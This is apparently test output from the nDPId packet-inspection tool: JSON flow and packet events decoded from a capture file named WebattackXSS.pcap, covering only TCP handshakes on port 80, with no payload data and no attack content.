+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1499347408367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347408367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3igaCcJ\/XWsBeaAScSBC2wAAAgQFtAQCCAoD5Ge9ATqWRwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1499347408368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347408368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0BAAD4GLpisEAABwKgKMt4oAFBdawF5GgnCgIAQAOXh4gAAAQEICgE6lkcD5Ge9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347409644,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347409644,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tAhAAD4GEcisEAABwKgKMt42AFAiiCOOAAAAAKACchChpgAAAgQFtAQCCAoBOpeGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1499347409644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347409644,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ja0TSQNIogjj6AScSBdSgAAAgQFtAQCCAoD5Gj8ATqXhgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3682,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1499347409645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347409645,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tAlAAD4GEc+sEAABwKgKMt42AFAiiCOPtE0kDoAQAOX8UAAAAQEICgE6l4cD5Gj8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347412160,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347412160,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VIxAAD4GcUSsEAABwKgKMt5QAFAbQM13AAAAAKACchD8dQAAAgQFtAQCCAoBOpn7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1499347412160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347412160,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3lBjDHLSG0DNeKAScSC4IAAAAgQFtAQCCAoD5GtxATqZ+wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1499347412161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347412161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VI1AAD4GcUusEAABwKgKMt5QAFAbQM14Ywxy04AQAOVXJwAAAQEICgE6mfwD5Gtx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347413405,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347413405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g\/NAAD4GQd2sEAABwKgKMt5eAFDJGhjAAAAAAKACchACDQAAAgQFtAQCCAoBOpszAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347413405,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3l7I3\/YFyRoYwaAScSDTeQAAAgQFtAQCCAoD5GyoATqbMwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1499347413405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347413405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g\/RAAD4GQeSsEAABwKgKMt5eAFDJGhjByN\/2BoAQAOVygQAAAQEICgE6mzMD5Gyo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347414709,"flow_last_seen":1499347414709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1499347414709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LQhAAD4GmMisEAABwKgKMt5sAFBxqrFxAAAAAKACchC\/dwAAAgQFtAQCCAoBOpx5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1499347414710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347414710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3mzO8Ll1caqxcqAScSDGHAAAAgQFtAQCCAoD5G3vATqceQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3725,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1499347414710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347414710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LQlAAD4GmM+sEAABwKgKMt5sAFBxqrFyzvC5doAQAOVlJAAAAQEICgE6nHkD5G3v"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347280049,"flow_last_seen":1499347285697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347281325,"flow_last_seen":1499347286697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347282573,"flow_last_seen":1499347287697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347417243,"flow_last_seen":1499347417243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347417243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1499347417243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82KJAAD4G7S2sEAABwKgKMt6GAFDK0UZQAAAAAKACchDO3gAAAgQFtAQCCAoBOp7yAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1499347417244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3oZtyr1sytFGUaAScSAwOgAAAgQFtAQCCAoD5HBoATqe8gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1499347417244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347417244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02KNAAD4G7TSsEAABwKgKMt6GAFDK0UZRbcq9bYAQAOXPQAAAAQEICgE6nvMD5HBo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347418519,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347418519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f6JAAD4GRi6sEAABwKgKMt6UAFCK5d+TAAAAAKACchB0OgAAAgQFtAQCCAoBOqAxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1499347418519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3pQDHUU3iuXflKAScSC3OQAAAgQFtAQCCAoD5HGnATqgMQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1499347418520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347418520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f6NAAD4GRjWsEAABwKgKMt6UAFCK5d+UAx1FOIAQAOVWQQAAAQEICgE6oDED5HGn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347419786,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347419786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QexAAD4Gg+SsEAABwKgKMt6iAFBxNOCCAAAAAKACchCLsQAAAgQFtAQCCAoBOqFuAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1499347419786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3qLCWbCfcTTgg6AScSCizgAAAgQFtAQCCAoD5HLkATqhbgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1499347419787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347419787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Qe1AAD4Gg+usEAABwKgKMt6iAFBxNOCDwlmwoIAQAOVB1gAAAQEICgE6oW4D5HLk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347421069,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347421069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88e9AAD4G0+CsEAABwKgKMt6wAFBX5lNAAAAAAKACchAw8wAAAgQFtAQCCAoBOqKvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3778,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3rDPNYnSV+ZTQaAScSBgwQAAAgQFtAQCCAoD5HQkATqirwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3779,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1499347421069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08fBAAD4G0+esEAABwKgKMt6wAFBX5lNBzzWJ04AQAOX\/yAAAAQEICgE6oq8D5HQk"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347422332,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347422332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 